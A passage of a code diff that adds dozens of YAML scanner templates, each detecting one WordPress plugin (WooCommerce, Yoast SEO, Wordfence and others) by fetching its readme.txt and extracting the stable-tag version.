table-of-contents-plus + wpscan: https://wpscan.com/plugin/table-of-contents-plus + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-tablepress.yaml b/technologies/wordpress/wordpress-tablepress.yaml new file mode 100644 index 0000000000..82f8c4973b --- /dev/null +++ b/technologies/wordpress/wordpress-tablepress.yaml @@ -0,0 +1,35 @@ + +id: wordpress-tablepress + +info: + name: TablePress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/tablepress/ + metadata: + plugin_namespace: tablepress + wpscan: https://wpscan.com/plugin/tablepress + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml new file mode 100644 index 0000000000..67b2fa9f85 --- /dev/null +++ b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml @@ -0,0 +1,35 @@ + +id: wordpress-taxonomy-terms-order + +info: + name: Category Order and Taxonomy Terms Order Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/taxonomy-terms-order/ + metadata: + plugin_namespace: taxonomy-terms-order + wpscan: https://wpscan.com/plugin/taxonomy-terms-order + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-the-events-calendar.yaml b/technologies/wordpress/wordpress-the-events-calendar.yaml new file mode 100644 index 0000000000..27e2caaa7c --- /dev/null +++ b/technologies/wordpress/wordpress-the-events-calendar.yaml @@ -0,0 +1,35 @@ + +id: wordpress-the-events-calendar + +info: + name: The Events Calendar Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/the-events-calendar/ + metadata: + plugin_namespace: the-events-calendar + wpscan: https://wpscan.com/plugin/the-events-calendar + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-themeisle-companion.yaml b/technologies/wordpress/wordpress-themeisle-companion.yaml new file mode 100644 index 0000000000..84aec52788 --- /dev/null +++ b/technologies/wordpress/wordpress-themeisle-companion.yaml @@ -0,0 +1,35 @@ + +id: wordpress-themeisle-companion + +info: + name: Orbit Fox by ThemeIsle Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/themeisle-companion/ + metadata: + plugin_namespace: themeisle-companion + wpscan: https://wpscan.com/plugin/themeisle-companion + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-tinymce-advanced.yaml b/technologies/wordpress/wordpress-tinymce-advanced.yaml new file mode 100644 index 0000000000..9a5861b002 --- /dev/null +++ b/technologies/wordpress/wordpress-tinymce-advanced.yaml @@ -0,0 +1,35 @@ + +id: wordpress-tinymce-advanced + +info: + name: Advanced Editor Tools (previously TinyMCE Advanced) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/tinymce-advanced/ + metadata: + plugin_namespace: tinymce-advanced + wpscan: https://wpscan.com/plugin/tinymce-advanced + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.yaml b/technologies/wordpress/wordpress-translatepress-multilingual.yaml new file mode 100644 index 0000000000..2c78201603 --- /dev/null +++ b/technologies/wordpress/wordpress-translatepress-multilingual.yaml @@ -0,0 +1,35 @@ + +id: wordpress-translatepress-multilingual + +info: + name: Translate Multilingual sites – TranslatePress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/translatepress-multilingual/ + metadata: + plugin_namespace: translatepress-multilingual + wpscan: https://wpscan.com/plugin/translatepress-multilingual + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml new file mode 100644 index 0000000000..d4633d0651 --- /dev/null +++ b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ultimate-addons-for-gutenberg + +info: + name: Spectra – WordPress Gutenberg Blocks Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ + metadata: + plugin_namespace: ultimate-addons-for-gutenberg + wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-under-construction-page.yaml b/technologies/wordpress/wordpress-under-construction-page.yaml new file mode 100644 index 0000000000..4a8f042b89 --- /dev/null +++ b/technologies/wordpress/wordpress-under-construction-page.yaml @@ -0,0 +1,35 @@ + +id: wordpress-under-construction-page + +info: + name: Under Construction Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/under-construction-page/ + metadata: + plugin_namespace: under-construction-page + wpscan: https://wpscan.com/plugin/under-construction-page + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-unyson.yaml b/technologies/wordpress/wordpress-unyson.yaml new file mode 100644 index 0000000000..8a2dfd1f3d --- /dev/null +++ b/technologies/wordpress/wordpress-unyson.yaml @@ -0,0 +1,35 @@ + +id: wordpress-unyson + +info: + name: Unyson Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/unyson/ + metadata: + plugin_namespace: unyson + wpscan: https://wpscan.com/plugin/unyson + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/unyson/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-updraftplus.yaml b/technologies/wordpress/wordpress-updraftplus.yaml new file mode 100644 index 0000000000..b70c0aea6e --- /dev/null +++ b/technologies/wordpress/wordpress-updraftplus.yaml @@ -0,0 +1,35 @@ + +id: wordpress-updraftplus + +info: + name: UpdraftPlus WordPress Backup Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/updraftplus/ + metadata: + plugin_namespace: updraftplus + wpscan: https://wpscan.com/plugin/updraftplus + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-use-any-font.yaml b/technologies/wordpress/wordpress-use-any-font.yaml new file mode 100644 index 0000000000..38ccc5ac1b --- /dev/null +++ b/technologies/wordpress/wordpress-use-any-font.yaml @@ -0,0 +1,35 @@ + +id: wordpress-use-any-font + +info: + name: Use Any Font | Custom Font Uploader Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/use-any-font/ + metadata: + plugin_namespace: use-any-font + wpscan: https://wpscan.com/plugin/use-any-font + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-user-role-editor.yaml b/technologies/wordpress/wordpress-user-role-editor.yaml new file mode 100644 index 0000000000..77ec825aa2 --- /dev/null +++ b/technologies/wordpress/wordpress-user-role-editor.yaml @@ -0,0 +1,35 @@ + +id: wordpress-user-role-editor + +info: + name: User Role Editor Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/user-role-editor/ + metadata: + plugin_namespace: user-role-editor + wpscan: https://wpscan.com/plugin/user-role-editor + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml new file mode 100644 index 0000000000..09a19730c6 --- /dev/null +++ b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml @@ -0,0 +1,35 @@ + +id: wordpress-velvet-blues-update-urls + +info: + name: Velvet Blues Update URLs Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/velvet-blues-update-urls/ + metadata: + plugin_namespace: velvet-blues-update-urls + wpscan: https://wpscan.com/plugin/velvet-blues-update-urls + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-w3-total-cache.yaml b/technologies/wordpress/wordpress-w3-total-cache.yaml new file mode 100644 index 0000000000..c8e2b61d4b --- /dev/null +++ b/technologies/wordpress/wordpress-w3-total-cache.yaml @@ -0,0 +1,35 @@ + +id: wordpress-w3-total-cache + +info: + name: W3 Total Cache Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/w3-total-cache/ + metadata: + plugin_namespace: w3-total-cache + wpscan: https://wpscan.com/plugin/w3-total-cache + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.yaml b/technologies/wordpress/wordpress-widget-importer-exporter.yaml new file mode 100644 index 0000000000..eb63b53942 --- /dev/null +++ b/technologies/wordpress/wordpress-widget-importer-exporter.yaml @@ -0,0 +1,35 @@ + +id: wordpress-widget-importer-exporter + +info: + name: Widget Importer & Exporter Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/widget-importer-exporter/ + metadata: + plugin_namespace: widget-importer-exporter + wpscan: https://wpscan.com/plugin/widget-importer-exporter + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml new file mode 100644 index 0000000000..5dcf94db2e --- /dev/null +++ b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woo-cart-abandonment-recovery + +info: + name: WooCommerce Cart Abandonment Recovery Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ + metadata: + plugin_namespace: woo-cart-abandonment-recovery + wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml new file mode 100644 index 0000000000..a7a4481df5 --- /dev/null +++ b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woo-checkout-field-editor-pro + +info: + name: Checkout Field Editor (Checkout Manager) for WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ + metadata: + plugin_namespace: woo-checkout-field-editor-pro + wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.yaml b/technologies/wordpress/wordpress-woo-variation-swatches.yaml new file mode 100644 index 0000000000..b6e620c400 --- /dev/null +++ b/technologies/wordpress/wordpress-woo-variation-swatches.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woo-variation-swatches + +info: + name: Variation Swatches for WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woo-variation-swatches/ + metadata: + plugin_namespace: woo-variation-swatches + wpscan: https://wpscan.com/plugin/woo-variation-swatches + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml new file mode 100644 index 0000000000..76deae52d4 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce-gateway-paypal-express-checkout + +info: + name: WooCommerce PayPal Checkout Payment Gateway Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ + metadata: + plugin_namespace: woocommerce-gateway-paypal-express-checkout + wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml new file mode 100644 index 0000000000..1ac476a9e6 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce-gateway-stripe + +info: + name: WooCommerce Stripe Payment Gateway Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-gateway-stripe/ + metadata: + plugin_namespace: woocommerce-gateway-stripe + wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-payments.yaml b/technologies/wordpress/wordpress-woocommerce-payments.yaml new file mode 100644 index 0000000000..6cda18c432 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-payments.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce-payments + +info: + name: WooCommerce Payments – Fully Integrated Solution Built and Supported by Woo Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-payments/ + metadata: + plugin_namespace: woocommerce-payments + wpscan: https://wpscan.com/plugin/woocommerce-payments + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml new file mode 100644 index 0000000000..33ee3925a2 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce-paypal-payments + +info: + name: WooCommerce PayPal Payments Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-paypal-payments/ + metadata: + plugin_namespace: woocommerce-paypal-payments + wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml new file mode 100644 index 0000000000..e3d9c76057 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce-pdf-invoices-packing-slips + +info: + name: PDF Invoices & Packing Slips for WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ + metadata: + plugin_namespace: woocommerce-pdf-invoices-packing-slips + wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-services.yaml b/technologies/wordpress/wordpress-woocommerce-services.yaml new file mode 100644 index 0000000000..cb6ac7329e --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-services.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce-services + +info: + name: WooCommerce Shipping & Tax Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce-services/ + metadata: + plugin_namespace: woocommerce-services + wpscan: https://wpscan.com/plugin/woocommerce-services + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce.yaml b/technologies/wordpress/wordpress-woocommerce.yaml new file mode 100644 index 0000000000..6e167452d8 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woocommerce + +info: + name: WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woocommerce/ + metadata: + plugin_namespace: woocommerce + wpscan: https://wpscan.com/plugin/woocommerce + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woosidebars.yaml b/technologies/wordpress/wordpress-woosidebars.yaml new file mode 100644 index 0000000000..20958ba714 --- /dev/null +++ b/technologies/wordpress/wordpress-woosidebars.yaml @@ -0,0 +1,35 @@ + +id: wordpress-woosidebars + +info: + name: WooSidebars Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/woosidebars/ + metadata: + plugin_namespace: woosidebars + wpscan: https://wpscan.com/plugin/woosidebars + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wordfence.yaml b/technologies/wordpress/wordpress-wordfence.yaml new file mode 100644 index 0000000000..529bb856f4 --- /dev/null +++ b/technologies/wordpress/wordpress-wordfence.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wordfence + +info: + name: Wordfence Security – Firewall & Malware Scan Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wordfence/ + metadata: + plugin_namespace: wordfence + wpscan: https://wpscan.com/plugin/wordfence + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wordpress-importer.yaml b/technologies/wordpress/wordpress-wordpress-importer.yaml new file mode 100644 index 0000000000..66fc824581 --- /dev/null +++ b/technologies/wordpress/wordpress-wordpress-importer.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wordpress-importer + +info: + name: WordPress Importer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wordpress-importer/ + metadata: + plugin_namespace: wordpress-importer + wpscan: https://wpscan.com/plugin/wordpress-importer + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wordpress-seo.yaml b/technologies/wordpress/wordpress-wordpress-seo.yaml new file mode 100644 index 0000000000..dbc1a7b82d --- /dev/null +++ b/technologies/wordpress/wordpress-wordpress-seo.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wordpress-seo + +info: + name: Yoast SEO Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wordpress-seo/ + metadata: + plugin_namespace: wordpress-seo + wpscan: https://wpscan.com/plugin/wordpress-seo + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-worker.yaml b/technologies/wordpress/wordpress-worker.yaml new file mode 100644 index 0000000000..acdadebb3a --- /dev/null +++ b/technologies/wordpress/wordpress-worker.yaml @@ -0,0 +1,35 @@ + +id: wordpress-worker + +info: + name: ManageWP Worker Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/worker/ + metadata: + plugin_namespace: worker + wpscan: https://wpscan.com/plugin/worker + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.yaml b/technologies/wordpress/wordpress-wp-fastest-cache.yaml new file mode 100644 index 0000000000..415d977d4b --- /dev/null +++ b/technologies/wordpress/wordpress-wp-fastest-cache.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-fastest-cache + +info: + name: WP Fastest Cache Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-fastest-cache/ + metadata: + plugin_namespace: wp-fastest-cache + wpscan: https://wpscan.com/plugin/wp-fastest-cache + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-file-manager.yaml b/technologies/wordpress/wordpress-wp-file-manager.yaml new file mode 100644 index 0000000000..e517a14f2e --- /dev/null +++ b/technologies/wordpress/wordpress-wp-file-manager.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-file-manager + +info: + name: File Manager Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-file-manager/ + metadata: + plugin_namespace: wp-file-manager + wpscan: https://wpscan.com/plugin/wp-file-manager + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + 